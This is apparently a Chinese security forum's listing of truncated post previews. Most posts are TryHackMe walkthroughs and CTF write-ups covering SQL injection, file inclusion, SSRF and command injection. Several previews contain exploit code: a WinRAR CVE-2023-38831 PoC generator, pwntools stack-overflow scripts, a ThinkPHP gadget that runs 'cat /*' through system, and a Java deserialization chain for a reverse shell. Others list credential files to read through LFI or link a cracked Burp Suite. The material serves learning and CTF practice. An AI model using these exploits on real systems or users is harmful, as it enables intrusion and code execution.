跳转到帖子

红队攻击面相关讨论

ISHACK聚集了大量的黑客技术爱好者和安全研究人员。渗透测试、木马分析、应急响应、红队工具、逆向破解、代码审计、爬虫技术、在这裡你可以探讨黑客攻防技术相关的所有话题。

  1. 前提 房间地址:https://tryhackme.com/room/overpass 两个问题 实战 靶机地址:10.10.109.42 扫一下 开放了ssh 以及80 我们是肯定需要进ssh的 gobu扫一下 当然我们也能dirb or dirsearch扫一下 进入admin 我们查看源代码 当然从扫描结果来看 把login.js暴漏出来了 这说明他不一定是让我们爆破 而是想办法绕过这个js 让我们代码审计一下 学过js的都知道 Windows.location是跳转的意思 这里的意思就是携带cookie就跳转到admin 这是我之前写的PHP登录页面 期中我们用<script> </script>就是写一段js 其中就使用JS进行Window.location跳转 我们看一下cookie.js(好像没什么用) 原来那个我能看出来 这挤一块了(实际上在互联网上正常的JS也是挤一块的),第一个才是另类, 不过看着有点难受 我们通过浏览器给我们整理一下看看吧 没看出个什么东西 再次折反过来分析login.js 这里需要把cookie设计成status0RCookie进行访问就能跳转/admin 那么好我们去试试…

    • 0 篇回复
    • 44 次查看
  2. 前言 本次我们将配合Burpsuite进行代码审计 如果此时你感觉burpsuite配置麻烦,或者报错,或者英文看不懂 附上此次用的开盒即用中文版burpsuite: 最新BurpSuite2023专业汉化版下载(无需任何配置) 2年前29106110 此外因为SQL靶场 有些人配置错误,或者配合Phpstudy感觉配置麻烦 我此次建了几个外网靶场 大家可以使用(请勿攻击 sql.yhu.cc sql1.yhu.cc sql2.yhu.cc sql4.yhu.cc 实战 房间地址:https://tryhackme.com/room/burpsuiterepeater 靶机:10.10.101.97 其实本次主要是使用Burp只不过期中有个很简单SQL注入 这个难易程度还不及SQL注入靶场前几个的难度 看一下这个网站 这里应该是他们的成员随便点进去看看 打开burpsuite拦截 …

    • 0 篇回复
    • 26 次查看
  3. 前言 这章节主要是介绍burpsuite的,再次学习和巩固 Foreign friends please use Google Translate plugin to translate this article for better viewing 如果还没有2023年最新的burpsuite专业版建议下载我这个开盒即用的burpsuite 最新BurpSuite2023专业汉化版下载(无需任何配置) 2年前29106110 room:https://tryhackme.com/room/burpsuiteintruder Walkthrough 前面太过于基础,没做笔记,在这里我直接复制老外写的笔记直到Task 12 CSRF令牌篡改那里在详细介绍 注意:本文章内容已经与较新版本的Burp Suite不适配,请谨慎参考。且Task12之前的部分只有代理能看到图片 Intruder是Burp Suite的重要组成部分。但一般来说,除了只执行简单的递归请求之外,Intruder 还可以…

    • 0 篇回复
    • 29 次查看
  4. 前言 RCE命令执行(可看前面发布的ctfshow的靶场)已打,ctfshow给的命令执行比较直接一点,相对于Thm打一遍再次巩固基础 自己现在的实力还是很菜 Foreign friends please use Google Translate plugin to translate this article for better viewing room:https://tryhackme.com/room/oscommandinjection 笔记 了解RCE漏洞 任务三命令注入 任务四修复命令注入 下一关 Windows 拿flag Ok 开下一章节 SQL注入 room:https://tryhackme.com/room/sqlinjectionlm SQL(结构化查询语言)注入,通常称为 SQLi,是对 Web 应用程序数据库服务器的攻击,导致执行恶意查询。当 Web 应用程序使用未经正确验证的用户输入与数据库进行通信时,攻击者有可能窃取、删除或更改私人数据和客户数据,并攻击 Web 应用程序身份验证方法以获取私有数据。或客户区。这就是为什么 SQLi 不仅是最古老的 Web 应用程序漏洞之一,而且也可能是最具破坏性的。 在这个房间中,您将了解什么是数据库、什么是SQL以及一些基本的 SQL 命令、如何检测 SQL 漏洞、如…

    • 0 篇回复
    • 35 次查看
  5. 发帖人 ISHACK AI BOT

    前言 直接放视频地址建议b站观看 https://tryhackme.com/r/room/expose sql注入+文件包含+文件上传+提权

    • 0 篇回复
    • 39 次查看
  6. 前言 英文题目为了校准谷歌和必应的搜索,谷歌和必应也都会把本站的每篇文章都收录 Foreign friends please use Google Translate plugin to translate this article for better viewing allow_url_fopen allow_url_include等函数导致文件包含漏洞 file_get_contents函数导致目录遍历 除了SSRF的靶场没打,文件包含和xss在ctfshow和xsshaozi打了 也在补天那里提交了几个xss存储型低危的洞 room:https://tryhackme.com/room/fileinc 笔记 笔记: /etc/issue 包含在登录提示之前打印的消息或系统标识。 /etc/profile 控制系统范围的默认变量,例如 导出变量、文件创建掩码 (umask)、终端类型、指示新邮件何时到达的邮件消息 /proc/version 指定Linux内核的版本 /etc/passwd 拥有有权访问系统的所有注册用户 /etc/shadow 包含有关系统用户密码的信息 /root/.bash_history 包含root用户的历史命令 /var/log/dmessage 包含全局系统消息,包括系统启动期间记录的消息 /var/mail/root root用户的所有电…

    • 0 篇回复
    • 33 次查看
  7. 前言 后期在打打CTFshow的靶场温习一下 Foreign friends please use Google Translate plugin to translate this article for better viewing 房间简介 在这个房间中,您将了解什么是SSRF、它们可以产生什么样的影响、您将查看一些 SSRF 攻击示例、如何发现 SSRF 漏洞、如何规避输入规则,然后我们为您提供了练习反对尝试你新发现的技能。 什么是 SSRF? SSRF代表服务器端请求伪造。该漏洞允许恶意用户导致网络服务器向攻击者选择的资源发出额外的或经过编辑的 HTTP 请求。 SSRF的类型 SSRF漏洞有两种类型:第一个是常规 SSRF,其中数据返回到攻击者的屏幕。第二个是盲目 SSRF 漏洞,即发生 SSRF,但不会将任何信息返回到攻击者的屏幕。 有什么影响? 成功的SSRF攻击可能会导致以下任一情况: 进入未经授权的区域。 访问客户/组织数据。 能够扩展到内部网络。 显示身份验证令牌/凭据。 room:https://tryhackme.com/room/ssrfqi 笔记 SSRF示例 寻找SSRF SSRF防御 SSRF实用 如tryhackme所说 将其他的照片改为私有 继续看tr…

    • 0 篇回复
    • 37 次查看
  8. 发帖人 ISHACK AI BOT

    一,xml概述 1.1引入 在我们日常生活中我们在各种网站上面个看到他们都有天气什么的,他们展示的形式可能不同,但他们所用的数据是一样的,那他们肯定已不是从卫星直接获取的而是从国家的一些平台获取的 但是在获取他们的数据的时候他,因为有很多种语言都能写后端,们不可能是用你的那种语言写的格式,他要针对所有的平台进行发布,就用到了xml格式: XML数据格式最主要的功能就是数据传输(就是从一个网站传到另一个网站) XML数据格式还有什么用途呢? 配置文件: config.xml (我们一个网站可能有几种语言编写,我们不可能给每种语言都配置相应的文件,我们就能用xml格式让他们都能用) 储存数据: 当作小型数据库 data.xml xml的效果:使数据具有结构性,易读易处理 什么是XML XML指的是可扩展性标记语言(html也是一个标记性语言); XML被发明的目的是传输和存储数据,而不是展示数据; XML的标签必须自定义,在写标签名的时候一定要有含义; XML是W3C推举的数据传输格式; 如何自己写一段XML? <root> #所有的XML必须有一个根节点 <user>内容</user> <msg>内容</msg> </root> XML和HTML有哪些区别? 1:HTML标签不能自定义,XML标签只能自定义; 2:HTML语法要求不严格,XML标签语法要求极其严格,必须…

    • 0 篇回复
    • 24 次查看
  9. 第1章 赛前准备——安装 译者:@Snowming 作为红队人员,我们通常不太关注某次攻击的目的(更关注的是攻击手法)。相反,我们想从那些高级威胁组织的 TTP(Tactics、Techniques & Procedures)中学到更多。举个例子,这是一个来自于火眼(FireEye)公司的公开的威胁情报分析报告。从报告中,我们可以看到:这个威胁组织使用推特作为 C2 服务器,也使用了 github 作为存储加密图片和经过信息隐写文件的仓库。 我们可以参考此报告,根据攻击手法的特点来针对性的做出合适的防御方案,来看你的公司是否能发现并拦截这种攻击。 让我们对 APT 攻击做一些基本的介绍。由 MITRE 公司提出的 ATT&CK 矩阵( Adversarial Tactics, Techniques, and Common Knowledge matrix ) 是对 APT 攻击的详细分解。这个矩阵中是一个在各种攻击场景中使用的不同 TTP 的大集合。 商用 ATT&CK 矩阵 - Windows版 译者注: 上面的矩阵仅仅包扩适用于 Windows 平台的技术。完整的商用 Enterprise ATT&CK 矩阵也包括适用于 macOS 和 Linux 平台的技术。 矩阵中的内容严格复制自原书。只是因为原书图片分辨率太低,为了读者的阅读体验,特意重新作图。ATT&CK 矩阵至今没有中文翻译,因为译者才疏学浅,不敢献丑翻译,故保留英文。但是需要说明的是,书中列出的矩阵内容,跟 MITRE 公司官…

    • 0 篇回复
    • 49 次查看
  10. 本文仅对影视剧中涉及的技术进行分析,对剧情不做详细的说明。感兴趣的童鞋可以去看看。PS: 技术分析按照剧情顺序进行(1~4)集前言电视开头,便给我展示了第一种攻击技术,恶意充电宝。看似利用充电宝给手机充电,但是在充电的过程中,便已经获取了用户的信息。 实现原理 这种方法,在我前面的文章中有所涉及《利用树莓派监控女盆友手机》,其实很简单,就是利用adb命令获取手机的信息,当然也可以利用adb命令安装shell。 实现难度 容易,只需要开启手机开发者先选即可。 但是在现实中,手机开发者选项是默认关闭的。像电视中的情形是不会实现的。 信息收集基于朋友圈收集信息 通过对朋友圈非朋友可见十条 查看最近朋友圈的动态,获取对方的相关的信息。再加上推测,得知女主老公出轨的可能性。表哥建议 非工作需要,还是尽量在微信中,将此功能关闭吧。 基于微信步数的信息收集 通过微信步数,可以获取当前在干嘛?如早上八点你刚睡醒,好友的步数已达到5000步,说明他很有可能在跑步锻炼身体。基于钓鱼链接的信息收集 在表哥前面的文章中,也写过类似的文章。通过探针可以简单的获取目标的IP地址,GPS信息,以及照片,录音等等。但是随着手机安全性能的提高,都会有弹窗提示。利用百度网盘备份数据 这个在生活中,常常遇到。而且在安装百度网盘后,备份通讯录等信息是默认开启的。可以一试!(最好将头像也换掉,这样才真实)利用滴滴分享行程 通过以上方案,主人公成功得到了对方的手机号码,并通过微信查找到了相关的账号。当然网安专家的电脑中毒了。 对驱动盘符的破解 这里当然是导演给了…

    • 0 篇回复
    • 17 次查看
  11. 前言 这个”对打”实际上用自己主机打的是同一台机器看谁能先打进并且修复漏洞 与htb对打不太一样 至于CTFshow还在更,换换口味 CTFshow更完下一个文章换个类型不然短时间老打同一类型容易忘 快二十分钟开始的时候来了个斯里兰卡的老外 域这边BGM都准备好了 老规矩先打开80端口 是一个功夫熊猫只是一张图片什么也没有 分析:可能有图片隐写 一看没有图片隐写 Ctrl+U查看源代码 给的一个关键词是shifu经验认为可能是ftp或者ssh的用户名 开始扫描端口 开放了22 53 80 139 445 3306 8009 9999 发现其实都没用 不过开放了22端口可能需要爆破 下面开始扫描目录 扫描出了WordPress程序和flag文件 先进WordPress 尝试登录后台 标题是po’s blog那么账号应该是po 随便输入一个密码 会跳转 发现这应该是伪造的 尝试访问flag目录 解码: 拿到第一个flag 之前源代码拿到的shifu ssh账号尝试爆破 密码是batman 尝试登录并且改密 提权 提权成功后全局搜索flag 拿到第二面flag …

    • 0 篇回复
    • 29 次查看
  12. 前言 房间地址:https://tryhackme.com/room/introdigitalforensics 作为一名数字取证调查员,您会看到与上图所示类似的场景。作为数字取证调查员,您应该做什么?获得适当的法律授权后,基本计划如下: 获取证据:收集笔记本电脑、存储设备、数码相机等数字设备。(请注意,笔记本电脑和计算机在打开时需要特殊处理;但是,这超出了本房间的范围。) 建立监管链:正确填写相关表格(样本表格)。目的是确保只有经过授权的调查人员才能获取证据,并且任何人都无法篡改证据。 将证据放在安全的容器中:您要确保证据不会损坏。对于智能手机,您需要确保它们无法访问网络,这样它们就不会被远程擦除。 将证据传输到您的数字取证实验室。 在实验室,过程如下: 从安全容器中检索数字证据。 创建证据的取证副本:取证副本需要先进的软件以避免修改原始数据。 将数字证据返回到安全容器:您将处理副本。如果您损坏了副本,您随时可以创建一个新副本。 开始在取证工作站上处理副本。 上述步骤改编自计算机取证和调查指南,第 6 版。 更一般地说,根据国防计算机取证实验室前主任 Ken Zatyko 的说法,数字取证包括: 适当的搜查授权:如果没有适当的法律授权,调查人员就无法开始搜查。 监管链:这对于随时跟踪谁持有证据是必要的。 用数学验证:使用一种特殊的数学函数(称为哈希函数),我们可以确认文件未被修改。 使用经过验证的工…

    • 0 篇回复
    • 34 次查看
  13. 通知 下面将会发布四篇文章以小白的视角(我压根不用装,因为我也是第一次学)来第一人称学习一下计算机网络一些原理 而且较为基础,请不要认为我在水文章,反而我坚定的认为这些基础的知识为以后的渗透思路能提供很大帮助! 模块地址:https://tryhackme.com/paths 其中第一篇网络安全只是引入安全就不必为大家更新 更新一下后四章,一章一个文章 深深解析一下:

    • 0 篇回复
    • 35 次查看
  14. 前言 WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码。 漏洞复现 利用代码 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import shutil import os import sys TEMPLATE_NAME = \"TEMPLATE\" OUTPUT_NAME = \"CVE-2023-38831-poc.rar\" BAIT_NAME = \"test.txt\" SCRIPT_NAME = \"test.bat\" def main(): global BAIT_NAME, SCRIPT_NAME, OUTPUT_NAME # 声明为全局变量 # 处理命令行参数 if len(sys.argv) > 3: BAIT_NAME = os.path.basename(sys.argv[1]) SCRIPT_NAME = os.path.basename(sys.argv[2]) OUTPUT_NAME = os.path.basename(sys.argv[3]) elif len(sys.argv) == 2 and sys.argv[1] == \"poc\": pass else: …

    • 0 篇回复
    • 22 次查看
  15. CryptoVigenere在https://www.boxentriq.com/code-breaking/vigenere-cipher 网站爆破得到为key:asterism 解密得到falg。 或者 根据题目Vigenere可看出是维吉尼亚密码 使用在线解码工具破解 https://guballa.de/vigenere-solver flag:flag{53d613fc-6c5c-4dd6-b3ce-8bc867c6f648} PWNsupercall简单栈溢出,利用LibcSearcher通过题目泄露出的_IO_2_1_stdin_的真实地址找到 libc 基地址,用one_gatget 来get shell。 #!/usr/bin/env python # -*- encoding: utf-8 -*- ''' @File : exp.py @Time : 2021/11/27 13:39:07 @Author : lexsd6 ''' from pwn import * from libcfind import * local_mote=0 elf='./supercall' e=ELF(elf) #context.log_level = 'debug' context.arch=e.arch ip_port=['123.57.207.81',16985] debug=lambda : gdb.attach(p) if local_mote==1 else None …

    • 0 篇回复
    • 26 次查看
  16. MISC1 签到难度 签到 复制给出的flag输入即可 2 range_download难度 中等 flag{6095B134-5437-4B21-BE52-EDC46A276297} 0x01分析dns流量,发现dns && ip.addr=1.1.1.1存在dns隧道数据,整理后得到base64: cGFzc3dvcmQ6IG5zc195eWRzIQ== 解base64得到: password: nss_yyds! 0x02分析http流量,发现ip.addr==172.21.249.233存在http分段下载数据,每次按照请求头range要求只下载一个字节。由于是random下载,所以需要按顺序整理,整理后可以得到一个加密的压缩包。 在整理过程中会发现缺失2349位字节,需要尝试对其进行修复。 由于0x01中,我们得到了zip的密码,所以可以对该字节进行爆破,如果密码正确,则修复成功。 0x03解开压缩包得到二维码, 扫描后得到: 5133687161454e534e6b394d4d325a7854475233566e6870626a42554e6a5a4a5645466c4e47786a62324e464d47705557464635546d6c536148565165564659645563774e327073515863324f5846555247314555564134555570706344686957444d336544684c596c4255556e6333636e687165486c756446413…

    • 0 篇回复
    • 26 次查看
  17. 0x00 Misc一、应该算是签到 二、Cthulhu Mythos 三、CyzCC_loves_LOL lovemath 0x01 Web一、EZ_TP <?php namespace think { class Request { protected $filter; protected $hook = []; protected $param = []; protected $config = []; public function __construct() { $this->filter = 'system'; $this->param = ['cat /*']; $this->hook = ['visible' => [$this, 'isAjax']]; $this->config = ['var_ajax' => '']; } } abstract class Model { private $data = []; protected $append = []; function __construct() { $thi…

    • 0 篇回复
    • 21 次查看
  18. WebHackMe开局一个文件上传,utf-16的编码绕过,然后根据提示爆破文件名 爆破最后四位 0000 - 9999, 就可以访问到了,注意是12小时。 PwnbabyropDEBUG # _*_ coding:utf-8 _*_ from pwn import * import numpy as np context.log_level = 'debug' #context.terminal=['tmux', 'splitw', '-h'] prog = './babyrop' #elf = ELF(prog) p = process(prog)#,env={"LD_PRELOAD":"./libc-2.27.so"}) libc = ELF("./libc-2.27.so") #p = remote("123.57.207.81",44823) def debug(addr,PIE=False): debug_str = "" if PIE: text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16) for i in addr: debug_str+='b *{}\n'.format(hex(text_base+i)) gdb.attach(p,debug_str) else: for i in…

    • 0 篇回复
    • 19 次查看
  19. Web 1.esay_eval<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a->a(); } } if(isset($_REQUEST['poc'])){ preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret); if (isset($ret[1])) { foreach ($ret[1] as $i) { if(intval($i)!==1){ exit("you want to bypass wakeup ? no !"); } } unserialize($_REQUEST['poc']); } }else{ highlight_file(__F…

    • 0 篇回复
    • 17 次查看
  20. 1.Web 1-1:题目名称:目录扫描 Flag: DASCTF{84a70245035ca88088a2ba6ae2378021} 1-3:题目名称:MissingData 主要就是开头ob_start();所以所有输出都会存到缓冲区,用户手动取输出 所以文件名$this->LOG_NAME由hello获得: $hello = $_GET['hello']; echo $hello; $this->LOG_NAME = base64_decode(ob_get_contents());//就把hello传过来的值存到LOG_NAME了 ob_clean(); 文件内容就是REMOTE_ADDR连接UA: $getlog->setIp($_SERVER['REMOTE_ADDR']); $getlog->setUserAgent($_SERVER['HTTP_USER_AGENT']); $getlog->echoLog(); $log_info = date("Y-m-d H:i:s ").ob_get_contents(); 最末尾析构函数会写日志 public $LOG_PATH = "/log/"; file_put_contents(dirname(__FILE__).$this->LOG_PATH.$this->LOG_NAME,$log_info); //路径也就是./log/$_GET['hello'] …

    • 0 篇回复
    • 27 次查看
  21. 一、WEB1.web_BaliYun进去之后一个文件上传,而且只能上传图片。访问www.zip拿到源码 网站源码:index.php:<?php include("class.php"); if(isset($_GET['img_name'])){ $down = new check_img(); # here echo $down->img_check(); } if(isset($_FILES["file"]["name"])){ $up = new upload(); echo $up->start(); } ?> class.php:<?php class upload{ public $filename; public $ext; public $size; public $Valid_ext; public function __construct(){ $this->filename = $_FILES["file"]["name"]; $this->ext = end(explode(".", $_FILES["file"]["name"])); $this->size = $_FILES["file"]["size"] / 1024; $this->Valid_ext = array("gif", "jpeg", "jpg", "p…

    • 0 篇回复
    • 21 次查看
  22. MISC 签到题 八道网络安全选择题,百度都能搜索到答案,这里如果只知道部分题目答案,可以通过枚举测试fuzz答案,获得flag flag: flag{a236b34b-8040-4ea5-9e1c-97169aa3f43a} RE re693 直接下载附件用golang打开 看main函数可以发现会打印两句话,要求输入有六个参数并且第三个为gLIhR 的函数、被调用三次并且会调用到cHZv5op8rOmlAkb6的函数 Input the first function, which has 6 parameters and the third named gLIhR: 输入第一个函数,它有 6 个参数,第三个名为 gLIhR: Input the second function, which has 3 callers and invokes the function named cHZv5op8rOmlAkb6: 输入第二个函数,它有 3 个调用者并调用名为 cHZv5op8rOmlAkb6 的函数: 直接全局搜索,第一个函数为,ZlXDJkH3OZN4Mayd,有6个参数 第二个函数可以先全局搜索cHZv5op8rOmlAkb6 看哪个函数会调用到这个函数,然后再进一步搜索看看符不符合题意,相对应函数为UhnCm82SDGE0zLYO 有6个,出去自己,还有之后那个2个重复判断,则有3个调用 然后就是看主函数 func main() { var nFAzj, CuSkl string …

    • 0 篇回复
    • 34 次查看
  23. web ai_java 首先通过附件帐号信件获取到帐号 通过base64或者jsfuck可获取提示js和c,审计一下js那么可以看到c函数,运行一下。获取到 github 项目地址 查找提交历史我们发现了源码 审计源码发现为 可能存在spring–boot 未授权绕过 在admin的页面下的/post_message/接口存在fastjson解析 查看具体版本发现无法直接ladp攻击,查看依赖 发现引入了shiro。使用 SerializedData + LDAP 攻击. 和无依赖 CB 进行反弹 shell public class CB { public static void setFieldValue(Object obj, String fieldName, Objec t value) throws Exception { Field field = obj.getClass().getDeclaredField(fieldName); field.setAccessible(true); field.set(obj, value); } public static Comparator getValue(Object instance) throws NoSuchFiel dException, IllegalAccessException { Class<?> clazz = instance.getClass(); // 获取私有变量的 Field 对象 Field privateFie…

    • 0 篇回复
    • 27 次查看
  24. 重在参与,主打一个陪伴 谁偷吃了我的外卖 下载地址https://pan.baidu.com/share/init?surl=kD5ISEjctcMVSua8PKQsgg 打开之后是一张图片 分离后是个zip 打开后有加密并且给了提示 第一个是空的 最后一个是 base64 被偷的是第一个 – = / 的意思是把-替换成/ 使用脚本去掉第一个提取中间的的四个字符 import zipfile import re import base64 with zipfile.ZipFile("/外卖箱.zip", 'r') as zf: fileNameList = zf.namelist() infoDict = {} for fileName in fileNameList: matchedData = re.findall(r'\d{1,}_[a-zA-Z0-9-+=\/]{4}', fileName) if matchedData != []: infoDict[matchedData[0][0:matchedData[0].find('_')]] = matchedData[0][matchedData[0].find('_')+1:] content = '' for idx in range(2,…

    • 0 篇回复
    • 17 次查看
  25. Re Emoji Connect 是Excel的插件,开始玩之后会初始化一个4848的矩阵,每个格子里有一个emoji,然后每次点击两个格子,如果两个格子里的emoji相同,就会消除这两个格子。一开始以为是消星星一类的三个格子的消除,但看game的逻辑每次只替换两个,所以确实是连连看。然后flag的逻辑就是每次消除的时候减去格子的 行列,下标是用神奇的方法从unicode转过去的,我这里直接用矩阵里emoji的最小值做下标偏移了 dat = '''😈 😑 😔 😎 😌 😆 😤 😮 😮 😟 😪 😂 😢 😐 😩 😙 😭 😎 😬 😅 😉 😦 😛 😥 😜 😤 😑 😨 😝 😗 😛 😁 😑 😏 😜 😠 😤 😋 😀 😁 😅 😖 😑 😡 😒 😇 😄 😛 😊 😈 😂 😘 😬 😩 😥 😬 😈 😫 😅 😊 😒 😦 😑 😅 😙 😔 😟 😩 😬 😐 😑 😮 😔 😥 😧 😖 😇 😦 😉 😈 😘 😯 😣 😉 😓 😞 😃 😌 😨 😖 😮 😙 😙 😫 😋 😣 😜 😉 😇 😮 😝 😞 😒 😪 😂 😬 😯 😃 😄 😘 😪 😛 😤 😑 😦 😯 😗 😋 😡 😤 😊 😨 😉 😬 😍 😏 😨 😔 😝 😀 😡 😝 😅 😧 😋 😔 😨 😗 😍 😨 😝 😈 😫 😤 😍 😍 😌 😅 😫 😏 😫 😗 …

    • 0 篇回复
    • 25 次查看